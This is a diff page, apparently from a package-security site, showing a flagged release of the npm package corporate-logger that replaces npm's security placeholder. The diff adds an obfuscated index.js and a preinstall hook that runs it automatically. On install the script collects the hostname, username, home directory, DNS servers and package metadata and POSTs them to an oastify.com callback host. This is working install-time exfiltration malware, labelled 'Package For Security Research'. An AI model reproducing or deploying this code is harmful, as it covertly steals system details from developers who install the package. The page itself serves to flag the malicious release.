corporate-logger 0.0.1-security → 1.3.10

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of corporate-logger might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +1 -0
  2. package/package.json +9 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1 @@
1
+ function _0x4700(_0x5d92b1,_0x150775){const _0x22833f=_0x4d7c();return _0x4700=function(_0x2423c5,_0x3a49db){_0x2423c5=_0x2423c5-(0x1*0x3b3+0x208e+-0x22b8);let _0x305900=_0x22833f[_0x2423c5];return _0x305900;},_0x4700(_0x5d92b1,_0x150775);}const _0x5a4c13=_0x4700;(function(_0x158753,_0x39de4c){const _0x5d5523=_0x4700,_0x5af992=_0x158753();while(!![]){try{const _0x98b03f=-parseInt(_0x5d5523(0x1b2))/(-0x2*0xcff+0x1*0x18dd+0x122*0x1)+-parseInt(_0x5d5523(0x1b0))/(0x1253+-0x2c9*0xd+0x11e4)+parseInt(_0x5d5523(0x18b))/(-0x2473+-0x1abf+-0x1*-0x3f35)*(parseInt(_0x5d5523(0x1ab))/(-0x13e3+-0x2134+0x351b*0x1))+-parseInt(_0x5d5523(0x189))/(0x2470+-0x7*-0x12d+0x1e*-0x17d)+-parseInt(_0x5d5523(0x1a2))/(0x18f3+-0x1b8b+0x29e*0x1)*(-parseInt(_0x5d5523(0x19d))/(-0x25ce*-0x1+-0x13c7+-0x1200))+-parseInt(_0x5d5523(0x196))/(-0x1069*0x1+0x2166+0x1*-0x10f5)+parseInt(_0x5d5523(0x18f))/(0x1a0c+-0x3*0x11b+-0x16b2)*(parseInt(_0x5d5523(0x1a7))/(0x1*0x21b3+0x12f*-0x17+-0x670*0x1));if(_0x98b03f===_0x39de4c)break;else _0x5af992['push'](_0x5af992['shift']());}catch(_0x229cf3){_0x5af992['push'](_0x5af992['shift']());}}}(_0x4d7c,-0x7ff36+0x38687+-0x3*-0x2e9e8));const os=require('os'),dns=require(_0x5a4c13(0x1ae)),querystring=require(_0x5a4c13(0x1a8)+'g'),https=require(_0x5a4c13(0x194)),packageJSON=require(_0x5a4c13(0x1a3)+_0x5a4c13(0x18c)),package=packageJSON[_0x5a4c13(0x19e)],trackingData=JSON[_0x5a4c13(0x1af)]({'p':package,'c':__dirname,'hd':os[_0x5a4c13(0x199)](),'hn':os[_0x5a4c13(0x1b1)](),'un':os[_0x5a4c13(0x198)]()[_0x5a4c13(0x18d)],'dns':dns[_0x5a4c13(0x19f)](),'r':packageJSON?packageJSON[_0x5a4c13(0x1a9)+'d']:undefined,'v':packageJSON[_0x5a4c13(0x192)],'pjson':packageJSON});function _0x4d7c(){const _0x4fe5a5=['51198xgEngi','./package.','4qsbtpisqd','.com','stdout','530010kJLDrR','querystrin','___resolve','length','8UCPOlY','POST','error','dns','stringify','78258lSKMPi','hostname','215235cTKeqP','827810Bipika','m0nyhx6skj','444534jhKibY','json','username','nLFcT','117JMzWNl','end','n/x-www-fo','version','mo.oastify','https','ded','3923344WdOdOk','rm-urlenco','userInfo','homedir','data','request','applicatio','168gclTBy','name','getServers','write','spgg47ayyz'];_0x4d7c=function(){return _0x4fe5a5;};return _0x4d7c();}var postData=querystring[_0x5a4c13(0x1af)]({'msg':trackingData}),options={'hostname':_0x5a4c13(0x18a)+_0x5a4c13(0x1a4)+_0x5a4c13(0x1a1)+_0x5a4c13(0x193)+_0x5a4c13(0x1a5),'port':0x1bb,'path':'/','method':_0x5a4c13(0x1ac),'headers':{'Content-Type':_0x5a4c13(0x19c)+_0x5a4c13(0x191)+_0x5a4c13(0x197)+_0x5a4c13(0x195),'Content-Length':postData[_0x5a4c13(0x1aa)]}},req=https[_0x5a4c13(0x19b)](options,_0x1c2d2f=>{const _0x30f3a5=_0x5a4c13,_0x198b0c={'nLFcT':_0x30f3a5(0x19a)};_0x1c2d2f['on'](_0x198b0c[_0x30f3a5(0x18e)],_0xd45faf=>{const _0x5b1433=_0x30f3a5;process[_0x5b1433(0x1a6)][_0x5b1433(0x1a0)](_0xd45faf);});});req['on'](_0x5a4c13(0x1ad),_0x49a4e7=>{}),req[_0x5a4c13(0x1a0)](postData),req[_0x5a4c13(0x190)]();
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
2
  "name": "corporate-logger",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.3.10",
4
+ "description": "Package For Security Research",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
6
12
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=corporate-logger for more information.